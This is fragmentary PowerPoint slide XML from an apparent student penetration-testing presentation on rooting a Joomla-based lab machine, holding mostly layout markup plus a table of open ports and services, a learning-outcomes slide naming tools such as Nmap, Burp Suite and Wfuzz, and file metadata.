          <a:xfrm>
            <a:off x="0" y="2683050"/>
            <a:ext cx="4329375" cy="2460450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="145" name="Google Shape;145;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4329375" cy="2683051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="146" name="Google Shape;146;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4329375" y="2683050"/>
            <a:ext cx="4814626" cy="1357550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="147" name="Google Shape;147;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4329375" y="3990475"/>
            <a:ext cx="4814625" cy="1153025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="148" name="Google Shape;148;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4323325" y="0"/>
            <a:ext cx="4914900" cy="2683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582950" y="0"/>
            <a:ext cx="9144000"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54" name="Google Shape;154;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="510450"/>
            <a:ext cx="4239374" cy="4432250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="155" name="Google Shape;155;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3130125" y="510450"/>
            <a:ext cx="5961426" cy="4432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0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="163050" y="1104900"/>
            <a:ext cx="5734050" cy="2933700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="161" name="Google Shape;161;p20"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6288975" y="251550"/>
          <a:ext cx="2515400" cy="2758260"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{158EDE2D-5140-4CE5-8088-8FD6ECF2DEED}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1257700">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="12577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a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OPEN PORT</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:solidFill>
                      <a:srgbClr val="999999"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>SERVICE</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:solidFill>
                      <a:srgbClr val="99999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80</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>HTTP</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110</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>POP3</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143</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>IMAP</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993</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>IMAPS</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995</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>POP3S</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10000</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>NDMP</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Google Shape;162;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246550" y="240175"/>
            <a:ext cx="2515500" cy="5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Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Chaos</a:t>
            </a:r>
            <a:endParaRPr sz="24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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="204050" y="1536675"/>
            <a:ext cx="8746200" cy="12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i="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Technology is good but the human is the weakness.</a:t>
            </a:r>
            <a:endParaRPr sz="3000" i="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3000" i="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3000" i="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="6858000" lvl="0" indent="457200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Google Shape;168;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7302925" y="2323075"/>
            <a:ext cx="1647300" cy="4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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Flong</a:t>
            </a:r>
            <a:endParaRPr sz="18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904</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>220</Paragraphs>
  <Slides>26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Montserrat</vt:lpstr>
      <vt:lpstr>Source Sans Pro</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Raleway</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Geometric</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Gain Root   </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Information Gathering  Ports 22 and 80 open On Port 80, http service was running, On Port 22 ssh was running The operating system the system was running on was Ubuntu Linux version 4 The Web content manager used to develop the webpage was Joomla.   </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Milestones   </vt:lpstr>
      <vt:lpstr>Learning Outcome  I had a better understanding of how to use tools that we had used in class before that i was confused about; Burp Suite, Nmap  Had a better understanding of Bruteforcing  Learnt how to use new tools like; Joomscan, CeWL, Wfuzz, Netcat,  Learnt how to recognize a base64 txt(characters are divisible by 4)  Had a better understanding of remote login using SSH  Had a better understanding of Penetration Testing Methodologies  </vt:lpstr>
      <vt:lpstr>Risk Assessment Methodology</vt:lpstr>
      <vt:lpstr>Summary of Findings</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Learning Outcome</vt:lpstr>
      <vt:lpstr>Meet the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Rohan Bhangale</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-02T12:12:18Z</dcterms:modified>
</cp:coreProperties>
</file>